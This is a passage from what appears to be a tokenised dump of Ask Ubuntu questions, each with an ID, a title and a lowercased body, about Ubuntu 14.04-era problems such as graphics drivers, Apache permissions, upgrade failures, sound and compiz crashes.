graphics family cl_device_available : 1 cl_device_vendor : intel cl_device_profile : full_profile cl_device_version : opencl 1.1 cl_driver_version : 0.2 cl_device_opencl_c_version : opencl c 1.1 cl_device_max_compute_units : 128 cl_device_max_clock_frequency : 1000 cl_device_max_work_group_size : 512 cl_device_address_bits : 32 cl_device_mem_base_addr_align : 32 cl_device_max_mem_alloc_size : 134217728 cl_device_global_mem_size : 4 cl_device_max_constant_buffer_size : 65536 cl_device_global_mem_cache_size : 8192 cl_device_global_mem_cacheline_size : 128 cl_device_local_mem_size : 65536 cl_device_profiling_timer_resolution : 80 cl_device_image_support : 1 cl_device_error_correction_support : 0 cl_device_host_unified_memory : 0 cl_device_extensions : cl_khr_global_int32_base_atomics cl_khr_global_int32_extended_atomics cl_khr_local_int32_base_atomics cl_khr_local_int32_extended_atomics cl_khr_byte_addressable_store cl_khr_fp64 cl_khr_icd cl_khr_gl_sharing cl_device_preferred_vector_width_int : 16 cl_device_preferred_vector_width_long : 16 cl_device_preferred_vector_width_float : 16 cl_device_preferred_vector_width_double : 0 cl_device_native_vector_width_int : 16 cl_device_native_vector_width_long : 16 cl_device_native_vector_width_float : 16 cl_device_native_vector_width_double : 16 i have latest nvidia drivers installed , or what i think is the latest that can be fetched from the repository nvidia-319-updates i have checked with my model of intel cpu and nvidia card that they are opencl/gl compatible . nvidia geforce gt 630m has cuda support built in according to nvidia 's driver homepage . i know graphics support for nvidia is a little sketchy and a bit unstable as they are for linux still currently , even after installing nvidia 's own official driver releases . my asus laptop is capable of hybrid graphics switching , and as far as i 've been able to search up on google , that it is possible to do that on linux , but involves a bit of tweaking and such so it can switch between intel hd graphics/nvidia at any time without having to reboot . inxi -gx graphics : card-1 : intel 3rd gen core processor graphics controller bus-id : 00:02.0 card-2 : nvidia gf108m [ geforce gt 630m ] bus-id : 01:00.0 x.org : 1.14.5 drivers : intel ( unloaded : fbdev , vesa ) resolution : 1366x768 @ 60.0hz glx renderer : mesa dri intel ivybridge mobile glx version : 1.4 ( 3.0 mesa 9.2.1 ) direct rendering : no as seen there it says fbdev and vesa is unloaded , i dunno if this is the cause why it does n't want to load properly , i should probably look at trying to enable them somehow . back to the main issue , the issue being the libopencl.so file being missing on the system , which is suppose to be inside /usr/lib/ or something like that , just running nvidia-detector returns none to the terminal screen . i have bumblebee-nvidia installed too but this does n't seem to make it work either as well as cuda related libs . i 'm running around a bit lost trying to find an answer to getting this to work and not turning up much results besides googling certain specific errors that pop-up .
450500	mount and bind directory to access it with apache 2.2.20 on ubuntu 11.10	i 'm new un the world of gnu/linux and i have a problem which i think is caused by the permissions which are not correct . i 'm running ubuntu 11.10 with chroot running under android 4.4.2 ( i do n't know if this expression is correct ) . when i mounted it i binded the android directory ( where i have my php projects ) `` /sdcard '' to the linux directory `` /media/sdcard '' . then i created a folder called `` media '' in `` /var/www '' and another folder within it called `` sdcard '' . when i access it with apache everything is correct ( it shows me an empty index of files ) and the permissions are : drwxrwxr-x . 2 root www-data 4096 apr 18 10:24 sdcard then i added a line in `` /etc/fstab '' which binds `` /media/sdcard '' with `` /var/www/media/sdcard '' : /media/sdcard /var/www/media/sdcard auto bind but it did n't worked . i rebooted ubuntu and android but it 's still not mounted . i tried to change `` auto bind '' with `` none bind 0 0 '' but still does n't work , `` /var/www/media/sdcard '' appears to be empty . finally , i tried using `` sudo mount -- bind /media/sdcard /var/www/media/sdcard '' which worked for me . but now the folder `` /var/www/media/sdcard '' has as permissions : drwxrwx -- x . 31 root 1028 4096 apr 16 5:52 and now apache throws me a 403 forbidden error instead of the previous empty list . is it caused by the permissions ? if that 's true , how can i `` restore '' them ? i tried with `` sudo chmod -vr 0775 /var/www/media/sdcard '' but it does n't work , and changing the ownership with `` sudo chown -vr www-data /var/www/media/sdcard '' does n't change anything . sorry for my english , i 'm from spain .
450501	can not browse using openvpn in kubuntu	on ubuntu 13.10 private internet access worked great but since changing to kubuntu 14.04 when i press connect from the network manager it connect but there is no internet access ? i also imported the ovpn files and entered the correct username/password .
450502	the ubuntu 14.04 iso	i download ubuntu 14.04 .iso which is 964mb file but when i create a bootable usb using unetbootin and yumi ( i used both ) .its show that total file size 962 mb and after all everything goes normal but when i boot my desktop pc with the live usb it only appear ubuntu startup logo with purple background and then nothing happen.and also when i burn the same .iso on a dvd the problem continues .
450503	sony vaio laptop builtin camera error code 45 ?	i have a sony vaio laptop , sv-f1532c , recently i sent it for a keyboard repair , they had to change the whole plastic of the keyboard , and maybe reinstall the keyboard driver , but now , instead my camera does not work it says it 's not connected , like in camera tool , says : to get started , connect a camera the error code is 45 when i check the device manager , the imaging devices are hidden and i have to select the show hidden devices to see it , but in properties , it says that the webcam is not connected this is the error : currently , this hardware device is not connected to the computer . ( code 45 ) to fix this problem , reconnect this hardware device to the computer . also the location is mentioned like : 0000.001d.0000.001.005.000.000.000.000 that i dont know it 's normal or not on internet i did not find so much useful stuff my windows is 8.1 home version 64 bit
450509	remote control for distribution upgrade	i 've launched distribution upgrade ( from 13.10 to 14.04 ) in unity . upgrade is running , but at the moment i do n't have physical access to that machine ( ssh is active ) how can i verify in shell status of running upgrade launched in unity ? can i complete the running upgrade via bash ( aka answer to config file merge dialogs which pops up during upgrade ) ?
450513	battery icon not showing in ubuntu unity 14.04 ?	after i did the latest update to ubuntu unity 14.04 , the battery status icon is suddenly not showing up anymore on the menu bar . i checked the settings , it should show , but it does n't ; what can i do ? please , explain in simple words , i come from windows ( yes , i 'm one of those who ditched xp ) and have very little linux experience . thank you .
450515	how to speed up virtualbox running on a host ?	ok ... so i have the newest virtualbox installed with ubuntu and it works all fine no bugs at all but it runs so slow ... no programs running in the background and my vbox takes up a lot of the cpu so it is doing something.any ways to speed it up ? ive only just started out with linux and ubuntu but is there any way to speed up my virtual machine ? i am running on host not guest .
450516	ubuntu 14.04 freezes on splash screen after broken upgrade from 13.10	i 'm using virtualbox to run my ubuntu vm on mac . i 've decided to make a distro upgrade which was apparently a very big mistake ... during upgrading my mac hung up and i had to make hard reset . after this , when i run my ubuntu vm i can see ubuntu splash screen with orange dots progress bar . all dots are orange and then if freezes . i managed to open root shell , and run : apt-get -f install dpkg -- configure -a apt-get update so at least apt is working now and all software seems to be up to date . but if i run : startx i get : x : exec of /usr/bin/xorg failed xinit : giving up xinint : unable to connect to x server : connection refused xinit : server error when i try to run /usr/bin/xorg manually i get : -bash : /usr/bin/xorg : can not execute binary file : exec format error any help would be appreciated .
450518	12.04 lts to 14.04 lts update error	last night i updated my home server from 12.04 lts to 14.04 lts . after the update process , i rebooted the server and now it goes into kernel panic during boot . this happens even if i boot into recovery mode . could anyone suggest what may be causing this issue and how to fix it . i don'r really want to have to do a clean install . thanks
450519	matlab install error : simulink 3d animation toolbox	i 'm trying to install matlab 8.0.1 ( r2013a ) on ubuntu13.10 64bit . there was some problem when i installed all the packages ( inclusive of simulink 3d animation toolbox ) and other packages preceding it installed without issues . however when it came to the simulink package , i got an error that read the following error was detected while installing sl3d_glnxa64 : archive is not a zip archive would you like to retry installing sl3d_glnxa64 ? if you press no , the installer will exit without completing the installation . more information can be found at /tmp/mathworks_root.log the /tmp/mathworks_root.log has some java errors . some googling told me this was because of insufficient /tmp space , and hence i tried created a subdirectory in my home folder and installed using ./install -tmpdir /path/to/home/subdir the temp directory was recognised and accepted ( as recorded in the log file ) . but still i get the same error . i was able to deselect the package and install matlab , which otherwise runs fine . how do i in install the simulink toolbox ?
450523	how to configure a lan connection for to computers in ubuntu 14.04	i am a student and i really need this for a project . i need to know how can i configure a lan connection in ubuntu . where should i start from ? which commands should be used in terminal ?
450524	use systemsettings 1.0 ?	i 'm developing a new app that i need to use the systemsettings module for ( i need to get the device serial , imei and stuff ) . when looking for a way to get these numbers i came across ubuntu system settings ( for the mobile device ) which uses this module and shows both serial and imei . when i added the systemsettings 1.0 module and submodules they are not installed on my computer . so i tried running it on a device , because they should be installed there , since the system settings app shows these numbers , right ? wrong . it does not work . so my question is : how do i install and use the systemsettings module used here : https : //bazaar.launchpad.net/~system-settings-touch/ubuntu-system-settings/trunk/view/head : /plugins/about/pagecomponent.qml thanks in advance , cheers daniel
450525	ubuntu wo n't boot after install on samsung np915s3g : error `` all boot options are tried . ''	so yesterday i went ahead and bought the samsung np915s3g ( ativ book 9 lite ) and installed tahr in hope that everything would go smoothly . for the most part it ; everything necessary seems to work off the bat . unfortunately when i restart it , nothing boots . i erased windows so that 's obviously not an option , but the computer seems pretty dead certain that there 's nothing there to boot . i think this might have a lot to do with uefi which is a field i have next to no experience with . there also seems to be a fat32 partition that consistently reappears when i delete it . any help is much appreciated , thanks .
450526	ubuntu 14.04 upgrade from 13.10	hi guys i would like to ask about upgrade of 13.10 to ubu 14.04 . when i type in cl sudo update-manager after finding new version and beginning of an upgrade dialog appears saying : free translation : can not calculate upgrade unsolvable error it could be due : upgrading to devel release upgrading from devel release unofficial software packages first one is not true , second neither , i am not using many unofficial packages . what to do ?
450527	about removing apt-cache and old kernels in ubuntu 14.04	i have upgraded ubuntu to 14.04 today , but in 14.04 ubuntu-tweak is not supported , i dont know how can i remove old kernels and apt-cache files please anyone help me by sending command-line for removing old kernels and ** also tell me about how to remove cache files ? please tell me how to use it safely so that command could not hurt ubuntu in anyways ** . please help me .
450531	no sound after upgrade from xubuntu 13.10 to 14.04	no sound , pavucontrol only shows `` dummy output '' . aplay gives nothing , lspci shows soundcard : 04:01.0 audio device : via technologies , inc. vt8237a/vt8251 hda controller subsystem : micro-star international co. , ltd. [ msi ] device 7318 flags : fast devsel , irq 17 memory at dfafc000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > did n't find any solution around the web . what can i do ?
450535	how to install ubuntu server with apt-get	i m having ubuntu minimal in a headless vps . now i can upgrade that to a desktop one using sudo apt-get install ubuntu-desktop which installs the desktop version ( link ) . how can i use apt-get to install ubuntu server ( link ) thanks
450536	my ibus pinyin broke with 14.04 release upgrade	i 've just upgraded to 14.04 and i 've got a problem with ibus pinyin input . while it is very-very nice that now i have a little floating panel on which i can switch between simplified and traditional characters , full/half width , and can reach the ibus preferences ; the pinyin dictionary seems to have broken . e.g . i ca n't even type such simple expressions like `` ni hao '' and `` xie xie '' . actually , i ca n't even type the `` hao '' ( good ) character alone , because `` ha '' ( laughter ) appears . probably i just have a problem with my settings , but i could n't figure out what is it . does anyone have an idea how to fix this problem ?
450537	no video driver with ubuntu 14.04 lts with asus eee pc x101ch	driver is missing , it could be easily tell apart that the relevent intel igp accelerated driver is not loaded in that specific device because windows move choppily and youtube playback is dropping frames 80 % the time , i have a number of configurations none exhibit such . ubuntu 14.04 lts in live trial running on a desktop atom/intel gma ; xubuntu 13.10 running on that desktop ; xubuntu 13.10 running on a pentium m/intel gma ; ubuntu 14.04 lts in live trial on that notebook ; xubuntu 13.10 on asus eee pc x101ch ; they all load up relevant intel igp driver and have smooth video , only ubuntu 14.04 lts live or installed on eee pc x101ch failed , so all i can figure so far is auto-detection is not working in this particular case , then if i am allowed to manually tune it up i have no idea where the relevant xorg.conf ( or even the file itself ) should be .
450539	how to remove the 'tile ' background in the launcher icons ?	first let me show my launcher : - i feel my launcher is made to look ugly by the 'square-tile-thing ' ( for the lack of a better word ) thats behind the icon . i want the icons alone to be viewed ( without the tile behind ) . so are there any ways to remove the 'square-tile-thing ' ? ps : - i am using ubuntu 14.04 lts with unity . by 'square-tile-thing ' i mean the square that is around each icon . ( see the picture above or see your own launcher ! )
450540	apache error 404 after upgrading ubuntu to 14.10	i have a problem with opening a page for example test.php which is in my directory /var/www/ . when i am trying to open it in my web browser typing : http : //localhost/test.php the apache tells me error 404 . everythink worked well before upgrate to ubuntu 14.10 . when i had previous version i could easly open this file in my web browser . in addition phpmyadmin opens well even after upgrading . any sugestions how to fix this problem ? thanks in advance .
450541	grub boot problems	so basically i downloaded linux ubuntu 12.04 ( on my windows 8 pc - dual boot intended ) and updated it to 13.10 and then it started having some problems with missing files so i just wanted to re-install it . so i deleted the partition and rebooted expecting me to be taken into the windows boot loader but there was an error : grub error : no such device . so i looked at a question on ask ubuntu : boot error > no such device : grub rescue and i followed the instructions os the top answer . i then rebooted an i am no longer getting any error just a plain black screen that says gnu grub version 1.99-22ubuntu3.10 and has some sort of grub command line . please help ! i want windows 8 back .
450545	login loop 14.04 but guest account ok	after upgrading to 14.04 from 13.10 which worked fine , i can not get past login as it just loops back . guest account works fine . can ctrl-alt f1 and use name and password ok there so not sure what is causing problem . pls help . update : video card is n9500gt tried chown username : username .xauthority but now get only splash screen at login with password . same thing happens in gdm . also sudo mv .xauthority .xauthority.bak no change . tried cat ~/.xsession-errors but got message that starts with ca n't save user-dirs.dirs and then gives more msgs and stops . how to see what is in .xsession-errors file .
450547	executable file location for krusader	i did a google seach but did n't find an answer . i 'd like to know where the executable of krusader is located . i have n't found in /opt or /usr/share/applications either . i need to know it to create a symbolic link for it in the desktop . and in general , where should i find the executable files for installed applications ?
450550	how to right-click in unity webapps new browser	i 've just installed ubuntu 14.04 and i 'm trying some webapps ( facebook , twitter , etc ) . firefox was the used browser in earlier versions , but now a dedicated browser is used instead . the problem is that i do n't know how to copy , paste , or any action other than click . right click does n't seem to work , nor ctrl+c/v , so i ca n't do any basic action such as copying a password . is there any way to do it that i do n't know about ?
450551	sound does n't work	so , i have a problem with sound . i 've use ubuntu since 1 year , but ... i 've always used to use headphones to play music . and i never used my internal speakers ... i used them when i was on windows , so i did n't notice that they do n't work ... if i unplug the headphones , and try to play some music ... this , will do n't work.. i also tried at sound settings to do some changes at output ... but.. it 's still do n't working . the speakers are good . can someone help me ? thank you guys . here 's a photo of output devices : http : //i57.tinypic.com/ibh184.png
450552	nm-applet disappeared from awn indicator session area after installing d-bus-1.8.0	i have ubuntu 13.10 , since glib 2.32 failed to compile some newer applications i compiled and installed glib 2.38 and its dependencies d-bus-1.8.0 . when i booted in the morning i noticed that nm-applet was missing from indicator session area . at first i thought it was acting up of network manager daemon and i run : sudo service network-manager restart icon appeared on awn indicator session area but does n't show active device and connections list . then i run : sudo nm-applet wireless icon appeared in a notification area ( systray ) in place of awn indicator session area and i get following messages in terminal : sudo nm-applet ** message : applet now removed from the notification area ** message : using fallback from indicator to gtkstatusicon ** ( nm-applet:16151 ) : warning ** : failed to register as an agent : ( 32 ) session not found ** message : applet now embedded in the notification area would anybody tell me how to fix it ?
450554	ubuntu launcher toggle	i am looking to create a 'toggle ' to put in my unity launcher to either start or stop my openvpn setting . basically i am looking for an icon that could either sudo /etc/init.d/openvpn start or sudo /etc/init.d/openvpn stop ( either by choosing one option or the other or by toggling when i click it ) . i 'm in the process of migrating to linux after a decade 's worth of mac usage , please keep it simple because my brain might 've rotted . i know this is possible because i saw it on a former colleague 's machine . output from route when i am not connected through the vpn : kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.111.1 0.0.0.0 ug 0 0 0 wlan0 192.168.111.0 * 255.255.255.0 u 9 0 0 wlan0 output when i am connected through the vpn kernel ip routing table destination gateway genmask flags metric ref use iface default 10.8.0.101 128.0.0.0 ug 0 0 0 tun0 default 192.168.111.1 0.0.0.0 ug 0 0 0 wlan0 10.8.0.1 10.8.0.101 255.255.255.255 ugh 0 0 0 tun0 10.8.0.101 * 255.255.255.255 uh 0 0 0 tun0 < openvpnserver > .net 192.168.111.1 255.255.255.255 ugh 0 0 0 wlan0 128.0.0.0 10.8.0.101 128.0.0.0 ug 0 0 0 tun0 192.168.111.0 * 255.255.255.0 u 9 0 0 wlan0
450555	very slow graphics performance after upgrade 12.04 = > 14.04	i upgraded from 12.04 to 14.04 and the performance is extremely sluggish ; windows open and close in slow motion . presumably my graphics hardware has not been recognized by the system . i think that i need advice about how to figure out what to do . maybe i should install some graphics software or maybe i should disable something in unity , but i do n't know where to start . my 'uname -a ' command says this : linux home0 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:08:14 utc 2014 i686 i686 i686 gnu/linux a command 'sudo lshw ' gives lots of information and i will try to extract what may be most relevant : home0 description : desktop computer product : tps01 ( ) vendor : foxconn version : 1.0 serial : to be filled by o.e.m . width : 32 bits capabilities : smbios-2.6 dmi-2.6 smp-1.4 smp configuration : boot=normal chassis=desktop cpus=2 uuid=6013cf95-1e02-e531-fd14-d027881b608d *-core [ ... ] *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : 080015 date : 06/07/2010 size : 64kib capacity : 960kib capabilities : isa pci pnp apm upgrade shadowing cdboot bootselect socketedrom edd int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot zipboot biosbootspecification *-cpu:0 description : cpu product : intel ( r ) atom ( tm ) cpu d525 @ 1.80ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : 6.12.10 serial : 0001-06ca-0000-0000-0000-0000 slot : cpu 1 size : 1800mhz capacity : 1900mhz width : 64 bits clock : 200mhz capabilities : x86-64 boot fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl tm2 ssse3 cx16 xtpr pdcm movbe lahf_lm dtherm configuration : cores=2 enabledcores=2 id=3 threads=4 [ ... ] *-pci description : host bridge product : atom processor d4xx/d5xx/n4xx/n5xx dmi bridge vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 02 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-display description : vga compatible controller product : atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : fea80000-feafffff ioport : dc00 ( size=8 ) memory : d0000000-dfffffff memory : fe900000-fe9fffff addendum : here is the output from a unity_support_test command . /usr/lib/nux/unity_support_test -p opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) igd x86/mmx/sse2 opengl version string : 1.4 mesa 10.1.0 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes and here is the output from lspci : lspci -k | grep -a3 vga 00:02.0 vga compatible controller : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller ( rev 02 ) subsystem : foxconn international , inc. device 0d55 kernel driver in use : i915 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) further addendum : i use this desktop for email , editing , web browsing . i do n't care for gaming or for videos and i 'll be happy to turn off whatever graphics treatment is associated with this extraordinarily slow behavior . it is not `` normal slow '' for old hardware ; the hardware is i686 from 2010 . let me clarify `` slow '' . the expected behavior ( my experience with 12.04 ) if i open an xterm or a browser window is that i see some visual trickery whereby the new window smoothly acquires its size or its color . under 14.04 the smoothness is all gone ; the new window acquires its final state in a jagged manner changing its size or shape maybe once or twice per second over a few seconds . a youtube movie ( displayed on firefox ) has a refresh rate of maybe 2 or 3 hertz . if i type text into the dash then the characters appear at a rate of maybe 1 per second . in some similar conversations and questions from back in 2010-2011 i see references to issues with compiz , but i do n't know what to do with that information . my system monitor shows that the cpu usage of compiz shoots up to 48 % or so whenever a window is opened ; so it is taking essentially all of one cpu on my 2-cpu system . when i drag a window around it is a jagged and lagged motion and compiz usage goes up to 60 % or more . perhaps it is relevant that my system has another problem as well : libudev.so.0 is not found ( as is noticed when chrome does not start ) . i really do n't know if this may have anything to do with the graphics performance . by the way , thank you to mikewhatever for editing this post to format the various system outputs as they were meant to be formatted ; i had not recognized how to achieve that .
450556	ubuntu 14.04 64bit and vlc 2.1.2 screensaver keeps coming on	greets all i have ubuntu 14.04 64bit running vlc 2.1.2 and xscreensaver installed from the software center . ( gnome screen-saver is not installed . ) whenever i play a video in fullscreen in vlc the screensaver comes on . i have the option `` inhibit the power management daemon during playback '' checked and `` disable screesaver '' checked but the screensaver still comes on . i upgraded from 13.10 64bit ubuntu and uninstalled vlc and reinstalled it but the screensaver still comes on . i reset my vlc config file by deleting it and starting vlc again to recreate http : //www.videolan.org/support/faq.html linux / unix : $ ( home ) /.config/vlc/vlcrc ( v0.9.0 and above ) ,
450557	installing ubuntu sda errors	it 's the 3rd time i had to reinstall ubuntu cause after a few weeks , i get the message `` hard disk error please run the hard disk test '' . i installed 14.04 lts 64bit first , 32bit now . last unsuccessful attempt failed with an error on swap space partition 5 scsii on dev/sda . after many attempts , i managed installing it again , but i 'm quite sure it will happen again the same thing cause during the installation i got the messages : buffer i/o error on device sda logical block 2 and error on device sda1 logical block i guess it 's the hard disk corrupted . would the manual installation selecting the partition help or is there anything else i can do ?
450558	what is the recommended disk partition for kubuntu 14.04 manual install and dual boot with windows 8.1 64 bit ?	my computer has 6gb ram and windows 8.1 64 bit . i try to install kubuntu 14.04 64 bit by manual disk partition . my current disk has 283gb free space . ( parted ) print free model : ata wdc wd10ezex-22b ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 17.4kb 1049kb 1031kb free space 1 1049kb 840mb 839mb ntfs basic data partition hidden , diag 2 840mb 1113mb 273mb fat32 efi system partition boot 3 1113mb 1247mb 134mb microsoft reserved partition msftres 4 1247mb 162gb 161gb ntfs basic data partition msftdata 5 162gb 700gb 538gb ntfs basic data partition msftdata 700gb 983gb 283gb free space 6 983gb 1000gb 16.9gb ntfs basic data partition hidden , diag 1000gb 1000gb 729kb free space
450561	no window manager after upgrading 13.10 to 14.04	machine is a single boot linux . after upgrading from 13.10 to 14.1 today , my son 's account starts without a window manager . he has his desktop icons and can click them but no menu and no launcher . i can start applications from the desktop icons but they start without window decorations . the funny thing is that on my account on the same machine there is no problem . i log in and everything looks right , just like it was in 13.10 . i tried to kill compiz on my session and got a similar effect . so i guess it is related to a compiz problem in my son 's account . i managed to put an icon that runs compiz -- debug on my son 's desktop . here 's the result : /usr/bin/compiz ( core ) - info : loading plugin : core /usr/bin/compiz ( core ) - debug : trying to load core from : /home/alon/.compiz-1/plugins/libcore.so /usr/bin/compiz ( core ) - debug : dlopen failed : /home/alon/.compiz-1/plugins/libcore.so : can not open shared object file : no such file or directory /usr/bin/compiz ( core ) - debug : trying to load core from : /usr/lib/compiz/libcore.so /usr/bin/compiz ( core ) - debug : dlopen failed : /usr/lib/compiz/libcore.so : can not open shared object file : no such file or directory /usr/bin/compiz ( core ) - info : starting plugin : core /usr/bin/compiz ( core ) - debug : started plugin : core /usr/bin/compiz ( core ) - debug : pending request : /usr/bin/compiz ( core ) - debug : - event serial : 1152 /usr/bin/compiz ( core ) - debug : - event window 0x3c00090 /usr/bin/compiz ( core ) - debug : - x : 0 y : 0 width : 0 height : 0 border : 0 , sibling : 0x0 /usr/bin/compiz ( core ) - debug : pending request : /usr/bin/compiz ( core ) - debug : - event serial : 1422 /usr/bin/compiz ( core ) - debug : - event window 0x3c00093 /usr/bin/compiz ( core ) - debug : - x : 954 y : 635 width : 875 height : 514 border : 0 , sibling : 0x3c00090 /usr/bin/compiz ( core ) - debug : pending request : /usr/bin/compiz ( core ) - debug : - event serial : 1543 /usr/bin/compiz ( core ) - debug : - event window 0x3c00096 /usr/bin/compiz ( core ) - debug : - x : 0 y : 0 width : 722 height : 434 border : 0 , sibling : 0x3c00093 /usr/bin/compiz ( core ) - info : loading plugin : ccp /usr/bin/compiz ( core ) - debug : trying to load ccp from : /home/alon/.compiz-1/plugins/libccp.so /usr/bin/compiz ( core ) - debug : dlopen failed : /home/alon/.compiz-1/plugins/libccp.so : can not open shared object file : no such file or directory /usr/bin/compiz ( core ) - debug : trying to load ccp from : /usr/lib/compiz/libccp.so /usr/bin/compiz ( core ) - debug : opened library : /usr/lib/compiz/libccp.so /usr/bin/compiz ( core ) - debug : loaded plugin ccp from : /usr/lib/compiz/libccp.so /usr/bin/compiz ( core ) - info : starting plugin : ccp /usr/bin/compiz ( core ) - debug : started plugin : ccp /usr/bin/compiz ( core ) - debug : refusing to manage window 0x3c00090 /usr/bin/compiz ( core ) - debug : received event : /usr/bin/compiz ( core ) - debug : - event serial : 1152 /usr/bin/compiz ( core ) - debug : - event window 0x3c00090 /usr/bin/compiz ( core ) - debug : - x : 0 y : 0 width : 0 height : 0 border : 0 , sibling : 0x0 /usr/bin/compiz ( core ) - debug : refusing to manage window 0x3c00093 /usr/bin/compiz ( core ) - debug : received event : /usr/bin/compiz ( core ) - debug : - event serial : 1422 /usr/bin/compiz ( core ) - debug : - event window 0x3c00093 /usr/bin/compiz ( core ) - debug : - x : 954 y : 635 width : 875 height : 514 border : 0 , sibling : 0x3c00090 /usr/bin/compiz ( core ) - debug : refusing to manage window 0x3c00096 /usr/bin/compiz ( core ) - debug : received event : /usr/bin/compiz ( core ) - debug : - event serial : 1543 /usr/bin/compiz ( core ) - debug : - event window 0x3c00096 /usr/bin/compiz ( core ) - debug : - x : 0 y : 0 width : 722 height : 434 border : 0 , sibling : 0x3c00093 i do n't know how to advance from here ... please help . update : i tried to uninstall compiz as @ jeffrey suggested ... and it resulted in my own account getting the same problem ( no window manager , only desktop icons ) . luckily i had an old backup and restoring got my window manager back . i learned in this process that it 's not just compiz but also unity and ubuntu-desktop - if either is uninstalled , i get the same problem . unfortunately the restore operation is not a real remedy - when i log out and then login , the new session still starts without a window manager ... i have to redo the restore to get it back . some more information : the window decorations , menu bar and launcher just appear at some point during the restore . i created a new backup ( after restoring ) and tried to restore it instead of the old one - this does n't do the trick . even though the contents should be identical , the window manager does n't appear unless i restore the old backup . another update : i found a crash log in /var/crash/_usr_bin_compiz.1001.crash - a large file with lots of library names listed , then a base64-encoded core dump ... i can upload the text part if necessary . update : https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/1292396 describes a similar problem . the solution suggested there is to delete /home/user/.config/dconf/user . this solved the problem of my account , but my son 's accont ( in which the original problem appeared ) still does n't have a window manager even after applying this in his account .
450562	av-h830 tv tuner installation error	i have a problem with installation drivers for my tv tuner avertv hybrid volad hd h830 . after running the script , i get this output : /lib/modules/3.13.0-24-generic/build found . verifying archive integrity ... extracting archive ... running installer ... start to compile objects ... failed to compile objects cp -f prebuild.bak prebuild.o make -c /lib/modules/3.13.0-24-generic/build o=/lib/modules/3.13.0-24-generic/build subdirs=`pwd` modules make [ 1 ] : wejście do katalogu `/usr/src/linux-headers-3.13.0-24-generic' cc [ m ] /tmp/avm-install/installer/kerntodemod.o in file included from /tmp/avm-install/installer/clgdt3305.h:11:0 , from /tmp/avm-install/installer/kerntodemod.h:4 , from /tmp/avm-install/installer/kerntodemod.c:1 : /tmp/avm-install/installer/osdep_dvb_2.h:4:26 : fatal error : dvb_frontend.h : nie ma takiego pliku ani katalogu # include `` dvb_frontend.h '' ^ compilation terminated . make [ 3 ] : *** [ /tmp/avm-install/installer/kerntodemod.o ] błąd 1 make [ 2 ] : *** [ _module_/tmp/avm-install/installer ] błąd 2 make [ 1 ] : *** [ sub-make ] błąd 2 make [ 1 ] : opuszczenie katalogu `/usr/src/linux-headers-3.13.0-24-generic' make : *** [ default ] błąd 2 i have read , that i need to install v4l . so i am trying to build it and get another error : ****************** * start building * ****************** make -c /usr/src/media_build/v4l allyesconfig make [ 1 ] : wejście do katalogu `/usr/src/media_build/v4l' no version yet , using 3.13.0-24-generic make [ 1 ] : opuszczenie katalogu `/usr/src/media_build/v4l' make [ 1 ] : wejście do katalogu `/usr/src/media_build/v4l' make [ 2 ] : entering directory `/usr/src/media_build/linux' applying patches for kernel 3.13.0-24-generic patch -s -f -n -p1 -i ../backports/api_version.patch patch -s -f -n -p1 -i ../backports/pr_fmt.patch the text leading up to this was : -- -- -- -- -- -- -- -- -- -- -- -- -- |diff -- git a/drivers/media/usb/gspca/dtcs033.c b/drivers/media/usb/gspca/dtcs033.c |index 5e42c71..ba01a3e 100644 | -- - a/drivers/media/usb/gspca/dtcs033.c |+++ b/drivers/media/usb/gspca/dtcs033.c -- -- -- -- -- -- -- -- -- -- -- -- -- no file to patch . skipping patch . 1 out of 1 hunk ignored make [ 2 ] : *** [ apply_patches ] error 1 make [ 2 ] : leaving directory `/usr/src/media_build/linux' make [ 1 ] : *** [ allyesconfig ] błąd 2 make [ 1 ] : opuszczenie katalogu `/usr/src/media_build/v4l' make : *** [ allyesconfig ] błąd 2 ca n't select all drivers at ./build line 490 . can you help me ? i have no idea what should i do . thanks !
450564	can not logout correctly since upgrade to 14.04	after i upgrade to 14.04 , i can not logout correctly , the system will hang on in black screen ( while the cursor is still visible ) , and i have to run killall -u $ username to get back to lightdm interface . i find the exactly process hanged my system on is `` init '' , after kill it the system logout correctly . anyone get any idea what might cause this issue , or which log file should i look into ?
450566	how to get seperate x screen multi-monitor working	just upgraded to 14.04 and after rebooting my secondary monitor is n't working the way it was before the upgrade . i tried to get it back working but it does n't seem to be working this time . before i had both monitors as separate x screens and i configured this through nvidia x server settings . now my second monitor has a black background but nothing else . i can still move my cursor to it but ca n't do anything on it . my xorg.conf file is at the bottom of this post . any one got any ideas ? if you need any more info just ask . # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 337.12 ( buildd @ charichuelo ) wed apr 9 12:25:02 utc 2014 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' screen 1 `` screen1 '' leftof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice 